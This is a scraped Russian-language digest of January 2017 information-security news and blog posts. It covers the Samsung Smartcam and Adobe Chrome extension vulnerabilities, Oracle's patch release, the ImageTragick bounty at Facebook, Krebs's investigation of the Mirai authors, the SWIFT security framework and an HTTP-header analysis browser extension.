    ITU-T E.409 по реагированию на инциденты для организаций электросвязи 
    Финнский стандарт по критериям аудита ИБ (KATAKRI)
    Канадский "ФЗ-152" (PIPEDA) 
    Французский стандарт по анализу рисков  (MEHARI)
    ISF SoGP
    NIST SP800-53

    Указание Банка России по угрозам ПДн
    FFIEC IT Examination Handbook
    Приказ №17 ФСТЭК
    Приказ №470 Минэкономразвития 
    Приказ ФСТЭК по КСИИ
    СТО БР ИББС 1.3 по сбору доказательств
    Проект ГОСТ с базовым набором защитных мер для финансовых организаций
    Концепция по ГосСОПКЕ
    Приказ №378 ФСБ
    NIST CSF v1.0
    Стандарт Катара по безопасности критических инфраструктур
    Понятно, что рекомендация будет простой - учитывать особенности восприятия информации при оформлении документов. Для этого можно либо ориентироваться на мировой опыт (благо его полно) и попробовать сделать самостоятельно, не забыв проверимость на "читаемость" на коллегах, либо нанять дизайнера в штат (или найти любителя дизайнов и макетов среди сотрудников), либо заплатить (что, конечно, врядли) агентствам, специализирующимся на таких вопросах.

    ЗЫ. Это же касается и многих корпоративных документов по ИБ, ориентированных вроде бы на рядовых пользователей, но совершенно ими не воспринимаемых. И причина тут может быть не в том, что контент плохой, а в том, что подача его неудовлетворительна.

    orig: 2017-01-20 01:56:00 / http://lukatsky.blogspot.com/2017/01/blog-post_20.html (click post title)



    В Samsung Smartcam обнаружен новый RCE-баг

    В 2014 году на конференции DEFCON 22 исследователи продемонстрировали удаленный захват контроля над IP-камерой производства Samsung. Разработчик на тот момент вместо выпуска патча попросту удалил веб-интерфейс, через который была проведена эта атака.

    По свидетельству экспертов Exploitee.rs (ранее группа GTVHacker), пользователей такое исправление не устроило, поэтому было решено вернуться к поиску уязвимостей в камерах линейки Smartcam. В субботу исследователи обнародовали новую находку — баг удаленного исполнения кода, свойственный устройствам модели SNH-1011, а возможно, и всем камерам Samsung.

    «Данная уязвимость возникла из-за отсутствия санации filename обновления прошивки в iWatch, — сказано в техническом описании бага, которое включает также PoC-эксплойт и инструкции по установке патча. — Специально сформированный запрос позволяет атакующему внедрить собственную команду, которая будет исполнена на уровне root».

    Представитель Samsung заявил Threatpost, что данная уязвимость характерна лишь для модели SNH-1011 и будет устранена при ближайшем обновлении прошивки.

    Эксперты Exploitee в свою очередь отметили, что мотивом для нового исследования послужила ответная реакция Samsung на их прежний отчет. «Получив уведомление об уязвимостях, Samsung отреагировала, убрав целиком локально доступный веб-интерфейс и взамен предложив пользователям услуги сайта Samsung SmartCloud, — пишут исследователи. — Это вызвало возмущение у ряда пользователей и сделало устройство малопригодным для использования в каких бы то ни было конфигурируемых по месту решениях мониторинга. По этой причине мы решили еще раз обследовать устройство, чтобы найти способ вернуть пользователям доступ к камерам и попутно убедиться в надежности новой прошивки».

    Меры, которые Samsung приняла в ответ на уведомление в 2014 году, выглядят особенно слабо в условиях, когда безопасность устройств, подключенных к Интернету, является объектом повышенного внимания. «Сам по себе этот недочет не позволяет проводить атаки из Интернета, пригодные для таких целей, как Mirai, однако использовать CSRF для заражения устройств в домашней сети в данном случае будет очень просто, — комментирует Крейг Янг (Craig Young), ведущий ИБ-эксперт Tripwire. — Когда вендор удаляет функциональность вместо латания брешей, как в случае с этой камерой, это всегда огорчительно».

    Хотя проблема, обнаруженная в 2014 году, была решена, новое исследование Exploitee показало, что после удаления веб-интерфейса от него остался набор скриптов PHP, позволяющий обновлять прошивку камеры через службу мониторинга iWatch.

    «Эти скрипты содержат баг внедрения команд, который непривилегированный пользователь сможет использовать для удаленного исполнения команды на уровне root», — пишут эксперты в блоге.

    По их словам, уязвимость в iWatch можно использовать, создав особое имя файла, которое сохранится в команде tar, передаваемой в качестве параметра при вызове php-функции system(). «Поскольку веб-сервер работает как root, filename предоставляется пользователем и эти входные данные используются без санации, нам удалось внедрить собственные команды, чтобы засвидетельствовать удаленное исполнение команд с правами root», — подводят итог исследователи.

    orig: 2017-01-19 23:00:38 / https://threatpost.ru/new-rce-flaws-found-in-samsung-smartcam/20167/ (click post title)



    WordPress Performance Optimization Guide

    WordPress Performance Optimization Guide

    Since launching our website performance testing tool we have been getting a lot of questions about how to improve the speed and performance of WordPress websites. Many website owners are not aware how slow their sites are, so we are excited to help shed some light on the matter.

    There are a number of different resources available to help you dive into the world of performance optimization. In this article, I want to create a proper foundation for any website owner to start thinking about performance optimization.

    Continue reading WordPress Performance Optimization Guide at Sucuri Blog.

    orig: 2017-01-19 19:08:14 / http://feedproxy.google.com/~r/sucuri/blog/~3/cgnuOgqWm1o/wordpress-performance-optimization-guide.html (click post title)



    ProtonMail запускает свой сервис в сети Tor

    ProtonMail, провайдер, предоставляющий услуги зашифрованной электронной почты, на этой неделе объявил о запуске скрытой службы Tor, чья роль заключается в оказании помощи в борьбе с цензурой правительств.

    Разработчики ProtonMail отметили, что использование Tor имеет ряд преимуществ, в их числе дополнительные уровни шифрования связи, защита реального IP-адреса пользователя, а также возможность обхода механизмов цензуры.

    С другой стороны, есть и негативные моменты – производительность будет ниже. Сейчас сайт имеет статус экспериментального и не может быть надежным.

    Сайт провайдера, созданный с помощью проекта Tor находится по адресу https://rotonirockerxow.onion. Он доступен только по протоколу HTTPS и использует сертификат от Digicert, компании, которая также выдала SSL-сертификат Facebook. Подробные инструкции о том, как получить доступ к сайту через Tor уже были опубликованы ProtonMail.

    «Так как наш сайт в сети Tor все еще является экспериментальным, мы не выкладывали никаких рекомендаций относительно его использования. Даже без использования Tor, ваш почтовый ящик ProtonMail по-прежнему хорошо защищен благодаря PGP-шифрованию и дополнительной двухфакторной аутентификации. Однако использование сети Tor является верным шагом в сторону дополнительной безопасности и анонимности пользователей» - говорят разработчики ProtonMail в своем блоге.

    orig: 2017-01-19 17:14:34 / https://www.anti-malware.ru/news/2017-01-19/21910 (click post title)



    ЛК выявила вредные привычки россиян в отношении паролей

    Каждый шестой интернет-пользователь в России сталкивался с попыткой взлома онлайн-аккаунта. Такие данные были получены в результате исследования* «Лаборатории Касперского». Основная причина – россияне все еще не научились грамотно пользоваться паролями, подвергая тем самым риску безопасность своих учетных записей и сохранность личных данных. 

    Далеко не все считают необходимым защищать свои аккаунты с помощью надежных и сильных паролей. Так, лишь треть (35%) пользователей создает новую комбинацию для каждого отдельного аккаунта, большинство же предпочитает оперировать ограниченным набором паролей, используя таким образом одно и то же для доступа сразу к нескольким учетным записям. Что еще хуже, 8% опрошенных россиян вообще обходятся одним-единственным кодом доступа для всех своих аккаунтов. 

    Помимо этого, российские пользователи не особенно стремятся сделать свои пароли устойчивыми к взлому. Например, заглавные и прописные буквы комбинируют лишь 30% участников опроса, а небуквенные и нецифровые символы используют всего 23%. И это при том, что значительное число пользователей уверено в необходимости сильных паролей для защиты своих ключевых аккаунтов – систем онлайн-банкинга (50%), социальных сетей (34%) и личных кабинетов в онлайн-магазинах (31%). 

    Также исследование «Лаборатории Касперского» показало, что зачастую люди довольно небрежно обращаются со своими паролями. К примеру, треть опрошенных делилась ими с членами семьи, а 9% – с друзьями. Кроме того, 31% российских пользователей привык записывать коды доступа на бумаге – чтобы не забыть их. Все эти действия в конечном итоге могут спровоцировать случайную утечку данных.   

    «Мы доверяем Интернету сегодня слишком много личной и конфиденциальной информации. Так что пароль уже давно перестал быть просто формальным «ключом» к частному аккаунту человека в Сети и превратился в первую ступень защиты, от надежности которой во многом зависит сохранность ценной информации. Между тем, люди продолжают относиться к паролям без должной серьезности, подвергая тем самым риску свои банковские аккаунты, электронную почту, личные файлы и многое другое, – рассказывает Андрей Мохоля, руководитель потребительского бизнеса «Лаборатории Касперского». – Лучшие пароли нельзя найти в словаре. По-настоящему надежный код доступа должен быть длинным, содержать много букв разного регистра, цифры и другие символы. Разумеется, запомнить подобные сложные комбинации для всего множества аккаунтов очень непросто, поэтому мы рекомендуем использовать специальные ращения для генерации и хранения паролей».

    orig: 2017-01-19 14:51:03 / https://www.anti-malware.ru/news/2017-01-19/21908 (click post title)



    Первый в году апдейт от Oracle закрыл 270 брешей

    В минувший вторник Oracle выпустила патчи для 270 уязвимостей в 45 различных продуктах, в том числе для E-Business Suite, Financial Services и MySQL. Многие из этих брешей, закрываемых в рамках первого в новом году квартального обновления, допускают удаленный эксплойт.

    По объему январский набор патчей от Oracle немного недотянул до рекордного уровня, зафиксированного в июле, — в том месяце разработчик залатал 276 брешей.

    Согласно Oracle, около 40% ныне закрываемых уязвимостей эксплуатируются удаленно и без аутентификации. Наибольшее количество таких багов устранено в пакете приложений E-Business Suite (EBS) — 118; Java SE и Fusion Middleware получили по 16 аналогичных патчей.

    В EBS совокупно закрыта 121 брешь; по свидетельству экспертов ERPScan, уделяющих особое внимание безопасности продукции Oracle и SAP, это рекордное количество для любого ПО разработки Oracle. Согласно матрице рисков для EBS, в случае эксплойта многие из новых уязвимостей влекут кражу критически важных для бизнеса данных или позволяют манипулировать ими.

    Самой серьезной уязвимостью в рамках январского выпуска является CVE-2017-3324 в Primavera Products Suite, облачной платформе Oracle для управления проектами; эта брешь оценена в 10,0 балла по шкале CVSS. Эксплуатация CVE-2017-3324 проста и открывает возможность для несанкционированного создания, удаления или модификации ключевых бизнес-данных, а также для проведения атаки на отказ в обслуживании. Данная проблема актуальна для Primavera версий 8.2, 8.3, 8.4, 15.1, 15.2, 16.1 и 16.2.

    «Легко эксплуатируемая уязвимость позволяет неаутентифицированному злоумышленнику, обладающему HTTP-доступом к сети, скомпрометировать Primavera P6 Enterprise Project Portfolio Management, — сказано в матрице рисков для этого продукта. — Уязвимость присутствует в Primavera P6 Enterprise Project Portfolio Management, но атаки могут в значительной мере повлиять на дополнительные продукты».

    Восемнадцать уязвимостей оценены по CVSS в 9,0 балла и выше (помимо CVE-2017-3324). При расстановке приоритетов их следует патчить в первую очередь, особенно бреши в Enterprise Manager Grid Control, Fusion Middleware и Java SE.

    Два бага из январского бюллетеня устранены благодаря бдительности ERPScan; это XSS в Peoplesoft, позволяющий перехватить данные сессии администратора с помощью особого HTTP-запроса, и DoS в OpenJDK. Многие уязвимости обнаружили исследователи из Onapsis — совокупно 102; как указал в блоге ИБ-эксперт компании Матиас Мевиэд (Matias Mevied), все эти бреши относятся к классу XSS. Детали он не сообщил, отметил лишь, что некоторые уязвимости допускают эксплойт с помощью простейшего параметра, другие — с использованием нескольких, более сложных параметров.

    Помимо ERPScan и Onapsis Research Labs свой вклад в январский выпуск Oracle внесли Cisco Talos, Tenable Network Security, Red Hat Product Security, Дэниел Блайхенбахер (Daniel Bleichenbacher) из Google и Дэвид Личфилд (David Litchfield), некогда тоже работавший в Google.

    Новый выпуск от Oracle задает высокие темпы выпуска патчей, количество которых за квартал может к концу года превысить прежний среднестатистический уровень. В 2015 году компания в среднем латала 153 уязвимости, в 2016-м — уже 227.

    orig: 2017-01-19 14:49:58 / https://threatpost.ru/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/20165/ (click post title)



    Facebook выплатили эксперту 40 000 долларов за уязвимость в ImageMagick

    Исследователь утверждает, что получил 40 000 $ от Facebook за обнаружение уязвимости удаленного выполнения кода в наборе программ ImageMagick. Брешь, о которой идет речь получила идентификатор CVE-2016-3714 и имя «ImageTragick». Информация о ней была раскрыта в мае 2016 года, по данным исследователей, эта уязвимость уже давно используется в реальных атаках и сейчас злоумышленники все чаще используют ее для получения удаленного доступа.

    Так как ImageMagick используется несколькими плагинами для обработки изображений и присутствует во многих веб-приложений, исследователи сразу же начали искать уязвимость ImageTragick в сервисах крупных компаний, в том числе Yahooinfo-icon.

    Эксперт из России Андрей Леонов недавно обнаружил, что Facebook также использовал уязвимые версии ImageMagick. Исследователь заметил запрос на Facebook, который включал параметр с именем «picture», значением которого был URL. Изображение, получаемое при помощи этого параметра, преобразовывается перед тем, как отображается пользователю.

    Леонов протестировал запрос на наличие бреши ImageTragick, в ходе этой проверки обнаружил, что конвертер изображений использует уязвимую версию библиотеки ImageMagick.

    Леонов раскрыл некоторые технические детали этой уязвимости, но воздержался от обнародования эксплоита, который использует эту брешь. Эксплоит Леонов направил непосредственно в Facebook. По словам эксперта, Facebook присвоили этой уязвимости статус критической и выплатили ему вознаграждение в размере 40 000 $.

    orig: 2017-01-19 14:36:11 / https://www.anti-malware.ru/news/2017-01-19/21907 (click post title)



    Три способа лучше защитить вашу гибридную среду

    protect

    Поскольку все больше организаций используют гибридную облачную среду, не удивительно, что они сталкиваются с новыми вопросами о  безопасности. Чем больше оборудования, больше данных  и больше вероятность возникновения угрозы, тем более актуальнее становятся вопросы безопасности.

    Убытки, которые несут компании в последнее время, достигают невероятных сумм, поэтому вопросы безопасности являются приоритетными.

    Чтобы помочь вам разобраться в данных вопросов, мы провели вебинар, на котором представлены предложения по решению этих новых проблем безопасности в гибридной облачной среде.

    Существуют три сферы, в которых управление гибридным облаком и безопасностью могут привнести реальные изменения в вашей компании.

     

    1. Совместить ИТ-операции и операции по обеспечению безопасности вместе.

    Часто ИТ-операции работают с одним набором инструментов и процедур, в то время как команды безопасности используют совершенно другой набор. Это отсутствие интеграции между системами, приводит к увеличению срока обнаружения угроз. Совмещение ИТ-операций и операций-безопасности вместе может глубоко повлиять на вашу эффективность в борьбе с угрозами безопасности.

     

    2. Обеспечить точную работу систем безопасности.

    После того как налажена работа с сотрудниками, пришло время наладить работу с данными, не забывая делать основные, базовые процедуры. Вовремя обновляйте системы, отслеживайте поведение пользователей, обращайте внимание на аномальные скачки сетевого трафика и пр.

    3ways-blogimagery_final_112916_thumb

     

    3. Включайте быстрое обнаружение угрозы и ответные меры.

    Преимущество наличия вашей команды и ваших данные в одном месте — это то, что вы можете более эффективно обрабатывать события безопасности. Вы можете улучшить свои возможности обнаружения угроз и уменьшить количество времени, необходимое для исследования атак. С правильными инструментами, вы можете быстро найти данные, увидеть карту подозрительного трафика, понять одну угрозу, или получить полную картину всей вашей системы.

    Мы рассказываем об этих моментах более подробно.
    Узнайте обо всех шагах, которые вы можете предпринять, чтобы получить полную картину вашего состояния безопасности и, как Operations Management Suite может вам помочь.

    Смотрите вебинар в записи.

    orig: 2017-01-19 12:48:02 / https://blogs.technet.microsoft.com/rutechnews/2017/01/19/three-ways-to-better-secure-your-hybrid-environment/ (click post title)



    Объем хранимых по «закону Яровой» данных могут снизить в 10 раз

    С соответствующим предложением выступило Минкомсвязи РФ.

    В четверг, 19 января, состоялось заседание экспертной рабочей группы, рассматривающей петицию об отмене «закона Яровой». Как сообщает РБК, Минкомсвязи РФ петицию не поддержало, но предложило в десять раз сократить объем информации, хранимой в рамках исполнения данного закона.

    По мнению замминистра связи и массовых коммуникаций Алексея Волина, стоит рекомендовать ведомствам и министерствам обеспечить уменьшение размера хранимой информации, исключив данные интернет-видео, торрентов и IP TV. Согласно подсчетам Минкомсвязи, если снизить объем данных, их хранение обойдется в 100 млрд руб. Как отметил Волин, силовые структуры уже одобрили данное предложение.

    Эксперты министерства предлагают ввести поэтапный переход к шестимесячному хранению информации, а сам переход растянуть на два года. Минкомсвязи также рекомендует создать необходимые условия для разработки российского аппаратного и программного обеспечения.

    Напомним, летом прошлого года президент РФ подписал ряд поправок в антитеррористическое законодательство, разработанных депутатами Госдумы Ириной Яровой и Виктором Озеровым. Согласно так называемому «закону Яровой», операторы связи должны хранить все записи звонков и сообщения пользователей в течение полугода, а метаданные - в течение трех лет.

    orig: 2017-01-19 12:46:16 / http://www.securitylab.ru/news/485076.php (click post title)



    Журналист установил личности авторов Mirai

    История началась в 2014 году с появления группировки «интернет-хулиганов» lelddos.

    Согласно заявлению журналиста Брайана Кребса, специализирующегося на расследованиях в области кибербезопасности, ему удалось установить личности создателя вредоносного ПО Mirai и одного из его помощников.

    Напомним, в сентябре прошлого года сайт Кребса подвергся мощнейшей в истории DDoS-атаке. Как оказалось, для ее осуществления злоумышленники использовали ботнет из IoT-устройств, зараженных вредоносным ПО Mirai. Через несколько дней некто под псевдонимом Anna Senpai выложил исходный код вредоноса в открытый доступ, сославшись на риски, связанные с продолжением киберпреступной деятельности.

    Первой зацепкой в расследовании Кребса стал тот факт, что Mirai является новейшим вариантом трояна, довольно популярного в последние три года. Летом прошлого года сайт журналиста уже подвергался нескольким мощным DDoS-атакам с использованием ботнетов из IoT-устройств, инфицированных предшественником Mirai, известным под названиями Bashlite, Gafgyt, Qbot, Remaiten и Torlus. Все его варианты действуют подобно червям, сканируя интернет на наличие уязвимых систем.

    В 2014 году предшественник Mirai использовался группировкой «интернет-хулиганов» lelddos. Чаще всего она атаковала серверы игры Minecraft, приносившие своим владельцам порядка $50 тыс. в месяц. Lelddos отлично понимали, что, атакуя серверы, они причиняют их операторам серьезный материальный ущерб. Кроме того, пользователи, столкнувшиеся с проблемами при подключении к серверу, попросту находили другой, и владелец оставался без заработка.

    В июне 2014 года группировка атаковала компанию ProxyPipe, предоставляющую защиту серверов Minecraft. Мощность атаки достигала 300 Гб/с. Согласно отчету компании Verisign, у которой ProxyPipe покупала защиту от DDoS, на то время это была самая мощная атака. Для ее осуществления злоумышленники использовали ботнет из более 100 тыс. серверов.

    В середине 2015 года серверы Minecraft подвергались атакам с использованием ботсети Qbot, состоящей из IoT-устройств. Атаки последовали сразу после того, как 17-летний Кристофер Скалти (Christopher Sculti) создал компанию по защите от DDoS-атак Datawagon. Ее клиентами также являлись владельцы серверов Minecraft.

    Серверы компании размещались в месте, числившемся за еще одним сервисом по защите серверов Minecraft от DDoS-атак ProTraf Solutions. Данная компания активно пыталась отбить у ProxyPipe клиентов. В 2015 году Скалти связался с вице-президентом ProxyPipe Робертом Коэльо (Robert Coelho) и заявил о намерении деактивировать его учетную запись в Skype (эксплоит для уязвимости в Skype на то время продавался online). Спустя несколько минут после угрозы аккаунты Коэльо и ряда других сотрудников ProxyPipe были отключены, и клиенты компании лишились связи с ней. Далее серверы ProxyPipe подверглись мощной DDoS-атаке, из-за чего большинство пользовавшихся ее услугами владельцы серверов Minecraft перешли к ProTraf Solutions.

    Кребсу история Коэльо показалась знакомой, ведь с ним произошло практически то же самое. В июле 2015 года Скалти связался с журналистом по Skype с целью похвастаться сканированием интернета на наличие IoT-устройств с заводскими учетными данными. По словам подростка, он обнаружил более 250 тыс. таких устройств и загрузил на них определенное ПО.

    Второй раз Скалти связался с Кребсом 20 сентября прошлого года – за день до атаки на его сайт. Подростка разозлила опубликованная журналистом статья с упоминанием его имени. Устав от злобных сообщений, Кребс заблокировал Скалти в Skype, а минутой позже его приложение наводнили запросы со взломанных аккаунтов, и пользоваться им уже было нельзя. Спустя 6 часов сайт журналиста подвергся DDoS-атаке мощностью до 620 Гб/с.

    По мнению Коэльо, в активную в 2014 году группировку lelddos входили Скалти и совладельцы ProTraf Solutions. Данную информацию также подтвердил бывший сотрудник ProTraf Solutions Аммар Зубери (Ammar Zuberi).

    Вскоре после атаки на сайт Кребса на хакерских форумах стала распространяться информация, что автором вредоноса Bashlite/Qbot является сотрудник ProTraf Solutions 19-летний программист из Вашингтона Джосайя Уайт (Josiah White). Несколькими годами ранее Уайт был известен в хакерских кругах как LiteSpeed. Бывший хакер подтвердил Кребсу, что действительно написал некоторые компоненты Bashlite/Qbot, но никогда не пытался их продать. По словам Уайта, один из друзей по форуму Hackforums предал его, опубликовав код online и пригрозив раскрыть личность LiteSpeed.

    Еще одним действующим лицом в данной истории является 20-летний сотрудник ProTraf Solutions Парас Джха (Paras Jha). Проанализировав его профиль на сайте LinkedIn, Кребс пришел к выводу, что точно такой же список навыков он уже где-то видел. Как оказалось, указанные на сайте LinkedIn данные совпадают с данными, опубликованными на хакерском форуме Hackforums кем-то под псевдонимом Anna-Senpai.

    До публикации исходного кода Mirai большинство постов Anna-Senpai на форуме были посвящены насмешкам над теми, кто использовал Qbot. В июле 2016 года хакер предупредил участников форума о создании вредоносного ПО, способного удалять Qbot с инфицированных устройств и предотвращать повторное заражение.

    orig: 2017-01-19 11:57:58 / http://www.securitylab.ru/news/485075.php (click post title)



    Про термин "аутсорсинг"

    Термин "аутсорсинг" часто встречается в статьях по управлению ИТ и ИБ, о нем регулярно говорят на отраслевых конференциях. Обычно его используют без определения, предполагая, что "и так все всё знают и понимают". Но оно не так просто, как кажется...
    В русскоязычных стандартах я смог его найти лишь в странном (и по сути и по переводу) ГОСТ Р 56781-2015 "Бенчмаркинг служб аутсорсинга и провайдеров услуг аутсорсинга.". В нем определение звучит так:Аутсорсинг - передача услуг или функций от одной организации внешним провайдерам.Еще в этом ГОСТе указывают:
    "Аутсорсинг" является искусственным термином, производным от английских слов "outside", "resource" и "using" и обозначает передачу услуг третьей стороне.
    Еще есть два варианта определения в проекте РС БР ИББС "Аутсорсинг ИБ" (в итоговой версии будет лишь один):Аутсорсинг (Outsourcing) – форма организации труда, при которой используется внешний поставщик услуг, предоставляющий их на регулярной основе.иАутсорсинг – передача организацией, на основании договора, определённых видов или функций производственной предпринимательской деятельности другой компании, действующей в нужной области.
    В англоязычных стандартах и "лучших практиках" примеров больше.
    ISO 37500-2014 "Guidance on outsourcing"Outsourcing  - business model for the delivery of a product or services to a client by a provider.
    Provider - prganization that offers a product or service to a client.И по тексту стандарта приводится расширенное описание:Outsourcing is a business model for the delivery of a product or service to a client by a provider, as an alternative to the provision of those products or services within the client organization, where:
     — the outsourcing process is based on a sourcing decision (make or buy);
     — resources can be transferred to the provider; — the provider is responsible for delivering outsourced services for an agreed period of time; — the services can be transferred from an existing provider to another; — the client is accountable for the outsourced services and the provider is responsible for performing them.
    Outsourcing Professional Body of Knowledge (OPBOK)Outsourcing. A long-term, results-oriented relationship with an external service provider for activities traditionally performed within the company. Outsourcing  usually applies to a complete business process. It implies a degree of managerial control and risk on the part of the service provider.
    ISACAOutsourcing. A formal agreement with a third party to perform Information system or other business function for an enterprise.
    ITILOutsourcing. Using an external service  provider to manage IT services.External service provider. An IT service provider that is part of a different organization from its customer. 
    "Outsourcing in Financial Services" (Basel Committee on Banking Supervision)Outsourcing is defined in this paper as a regulated entity’s use of a third party (either an affiliated entity within a corporate group or an entity that is external to the corporate group) to perform activities on a continuing basis that would normally be undertaken by the regulated entity, now or in the future.
    "The Outsourcing Handbook. A guide to outsourcing" (Deloitte)Outsourcing  is the contracting out of business function to an external supplier, involving the transfer of people, processes and assets.
    Эти термины можно обобщить до 4 важным моментов:

  • Аусторсинг - это услуга/сервис. Перечень возможных услуг обычно документируется Поставщиком (Провайдером) в Каталоге услуг.
  • Услуги предоставляет третья сторона (внешний поставщик). По ITIL таких поставщиков, кстати, именуют Type III (Type I – internal service provider, Type II – shared services unit, Type III – external service provide).
  • На аутсорсинг передаются информационные системы и/или процессы.
  • Услуги предоставляются на регулярной основе. 
  • orig: 2017-01-19 11:34:07 / http://80na20.blogspot.com/2017/01/blog-post.html (click post title)



    Новые требования по кибербезопасности SWIFT

    В собственный Топ 5 международных событий по ИБ прошлого года на последнее место я включил атаки на SWIFT, систему, которая раньше не часто попадала в прицел злоумышленников. И вот в конце прошлого года, в рамках программы Customer Security Programme (CSP), SWIFT выпустила документ под названием "SWIFT Customer Security Framework. Supplementary Guide", который устанавливает набор обязательных и рекомендательных защитных мер для клиентов SWIFT. Первые (обязательные) меры являются основой для защиты информации, передаваемой в рамках SWIFT (это некий аналог базового набора мер в 17-м приказе или набора защитных мероприятий в проекте нового ГОСТа Банка России), а вторые описывают лучшие практики, повышающие уровень защищенности.

    Новые требования распространяются на 4 компонента:


    Соединение с SWIFT, ИТ-инфраструктура и бэкофис заказчика в область действия SWIFT CSF не попадают:
    При этом, что мне понравилось и чего не хватает в отечественных документах, в визуальной форме показаны типы архитектур, покрываемых требованиями, что облегчает восприятие и реализацию документа. Таких архитектур выделено 4 - от максимально возможной (архитектура А1 - полный стек технологий SWIFT) до минималистичной (архитектура B - отсутствие на стороне заказчика локальной SWIFT-инфраструктуры и наличие только пользователей и их ПК).

    Для каждой из 4-х архитектур описаны требования по безопасности, которые, как я уже написал выше, делятся на обязательные и рекомендательные. Документ получился достаточно объемным - 52 страницы, содержание которого показано ниже. Приставка A после номера требования (например, 7.3А - пентесты, 6.5А - обнаружение атак, 2.7А - сканирование уязвимостей) означает рекомендательность требования (от слова "Advisory").
    Описание требований лаконичное, но предельно понятное - никакого растекания мыслью по древу. Вот пример описания защитной меры "защита данных при передаче за пределы контролируемой зоны".
    Несмотря на объем, все требования нового документа можно увязать с всего тремя целями:

    Во втором квартале 2017-го года заказчики SWIFT начнут сообщать в SWIFT о своем соответствии данным требованиям (в обязательной их части), а с января 2018-го года это станет обязательной нормой - все заказчики должны будут проводить собственную оценку соответствия (SWIFT называет это знакомым словом "аттестация") и направлять ее результаты на ежегодной основе. Дополнительно SWIFT планирует случайным образом ежегодно выбирать некоторых заказчиков для проведения более глубокого их аудита внутренними или внешними аудиторами. Данное требование напоминает шаги нашего Банка России, который требует отправлять результаты оценки соответствия 202-й формы, а при необходимости проводит дополнительные надзорные мероприятия в отношении выбранных банков.

    Статус соответствия требованиям будет размещаться в публичном реестре (SWIFT KYC Registry), чтобы каждый смог убедиться в надежности своих партнеров и контрагентов. По сути, это идея, которую не довел до финального завершения Банк России, который собирал результаты оценки соответствия СТО БР ИББС и хотел их публиковать на сайте. Сейчас же все ограничилось тем, что ЦБ публикует список тех, кто присоединился к СТО, без указания их уровня соответствия. Я не знаю, насколько это повышает стимулирует заказчиков выбирать более защищенные финансовые организации, но инициатива SWIFT интересная - посмотрим, что из нее получится.

    Могу отметить, что документ не содержит каких-то новых требований, неизвестных заказчикам SWIFT, и ранее им невстречавшихся в других нормативных документах (том же PCI DSS или NIST CSF). Поэтому для облегчения внедрения SWIFT Customer Security Framework в конце документа содержит таблицу соответствия своих требований наиболее известным лучшим мировым практикам:


    Получить данный документ может любой заказчик SWIFT - он выложен на официальном сайте, в разделе для зарегистрированных пользователей.

    orig: 2017-01-19 11:20:26 / http://lukatsky.blogspot.com/2017/01/swift.html (click post title)



    Безопасность сайта по его заголовкам, или что делать, если хочется залезть во внутренности каждого сайта

    Разработчики стараются внимательно относиться к своим продуктам, минифицируют файлы, настраивают кэш, дерутся за каждую миллисекунду скорости. Но почему-то почти везде игнорируется то, что самым первым отправляется пользователю — а именно заголовки HTTP. Как-то довелось мне посетить курсы по информационной безопасности, и там советовали первым делом смотреть именно на них, поскольку о них чаще всего и забывают.

    image

    Я как лентяй программист который параноит при каждом заходе на сайт увлекается информационной безопасностью, решил развить эту идею. Если вам интересно, милости прошу.

    Первое, на что я наткнулся — было отличное
    приложение от разработчиков Mozilla
    , которое анализирует Headers и много чего другого и выставляет оценку безопасности сайту. Очень хорошая вещь, и мне самому очень помогла, но пользоваться ей не всегда удобно.

    И я решил сделать свое приложение, которое могло бы с лету анализировать все сайты, которые я посещаю, анализируя HTTP headers и выставляя оценку подобно сайту Mozilla. А еще очень хотелось, чтобы оно сразу определяло не использует ли сервер уязвимые технологии. И чтобы готовить умело. Но от последней фичи впоследствии пришлось отказаться.

    Код можно посмотреть на GitHub, хотелось бы выразить благодарность noomorph за советы в непрофильном для меня JavaScript. Само расширение доступно по ссылке: HeaderView

    Для демонстрации работы, можно просто открыть хабр, и если вы им воспользуетесь вскоре после публикации статьи, то скорее всего увидите следующее:

    image
    Оценка безопасности сайта F+, из расчета что А — наивысшая оценка, и F — наинизшая. Хабр имеет хедеры безопасности, но вместе с тем, он показывает на каком языке он работает, и версия этого языка малость устарела (на момент публикации статьи актуальная версия PHP 5.6.29 согласно официальной документации. Расширение автоматически формирует ссылку по которой вы можете увидеть уязвимости данной версии.

    В качестве поисковика уязвимостей я выбрал Vulners, так как, во-первых, он мне нравится, а во-вторых, я не знаю других, и если у вас таки есть что мне подсказать, буду рад.

    Также расширение пытается анализировать используемый сервер, но в данном случае хабр не показывает версию, и определить уязвима ли она не представляется возможным.

    Что интересно, при переходе с Geektimes на хабр, редирект проходит через другой сервер, у которого версия PHP чуть поновее:

    image
    Хотя и недостаточно.

    Таким образом, я теперь просматриваю все сайты, где оставляю личную информацию или совершаю покупки.

    Если у вас свой ресурс, стоит посмотреть, что вы сообщаете в мир, а по-хорошему рекомендуется не только скрыть версию языка/сервера, но и вовсе не показывать какие технологии вы используете. Это, конечно, не поможет уберечься от целенаправленной атаки, но является правилом хорошего тона.

    Буду рад подсказкам и идеям что добавить, а так же чем расширить распознаваемые технологии!

    orig: 2017-01-19 10:58:14 / https://habrahabr.ru/post/319932/ (click post title)



    Хакеры использовали сервис Gmail для фишинга

    Хакеры запустили фишинговую компанию, жертвами которой становятся пользователи почтового сервиса Google Gmail

    orig: 2017-01-19 10:51:17 / http://www.jetinfo.ru/news/?nid=4a883abf5173e154a4c8ce69bfb461a5 (click post title)



    В популярном расширении Acrobat для Chrome обнаружена XSS-уязвимость

    Исследователь Googleinfo-icon Project Zero Тэвис Орманди (Tavis Ormandy) обнаружил, что расширение Adobeinfo-icon для Chrome, которое устанавливается в фоновом режиме, имело уязвимость межсайтового скриптинга (XSS). Adobe быстро исправили брешь после того, как узнали о ее существовании.

    Обновления Acrobat Reader, выпущенные Adobe 10 января исправляют 29 уязвимостей. От некоторых пользователей поступали жалобы на то, что это обновление автоматически устанавливает расширение Adobe Acrobat для Chrome, которое преобразует веб-страницы в PDF-файлы.

    Это расширение требует разрешение на доступ к данным на веб-сайтах, посещаемых пользователем, управление загрузками и взаимодействие с родными приложениями. Инструмент также собирает некоторую информацию на системе, но Adobe утверждает, что она не является конфиденциальной.

    Расширение, проанализированное Орманди имеет около 30 миллионов загрузок. После того, как эксперт обнаружил уязвимость, позволяющую выполнение JavaScript-кода с повышенными привилегиями, он квалифицировал ее как «брешь критической степени опасности».

    Более подробную информацию о том, как можно эксплуатировать эту уязвимость можно прочитать в официальном сообщении эксперта Орманди.

    Adobe получили информацию о бреши 12 января, а несколько дней спустя исправили ее.

    orig: 2017-01-19 10:47:50 / https://www.anti-malware.ru/news/2017-01-19/21904 (click post title)



    Deceive in order to detect

    no-image

